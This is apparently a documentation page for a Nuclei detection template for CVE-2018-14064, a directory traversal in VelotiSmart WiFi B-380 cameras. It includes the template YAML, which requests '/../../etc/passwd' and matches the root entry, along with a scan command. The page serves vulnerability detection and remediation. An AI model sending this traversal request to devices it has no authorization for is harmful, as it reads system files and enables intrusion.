VelotiSmart Wifi - Directory Traversal
ID: CVE-2018-14064
Severity: critical
Author: 0x_Akoko
Tags: cve2018,cve,edb,lfi,camera,iot,velotismart_project
Description
Section titled “Description”VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80.
YAML Source
Section titled “YAML Source”id: CVE-2018-14064
info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko severity: critical description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in VelotiSmart Wifi. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 - https://medium.com/%40s1kr10s/velotismart-0day-ca5056bcdcac - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 epss-score: 0.15741 epss-percentile: 0.95931 cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 vendor: velotismart_project product: velotismart_wifi_firmware tags: cve2018,cve,edb,lfi,camera,iot,velotismart_project
http: - method: GET path: - "{{BaseURL}}/../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 4b0a00483046022100ede90eb23c40ac0e091f30ebd3d8eabe0550c8e7660dd360912efb8ef311b0dc0221009f1e09685a8c2f45deaf0fe45d5bac312bedf37d799b6b946a33ab7f53118002:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-14064.yaml"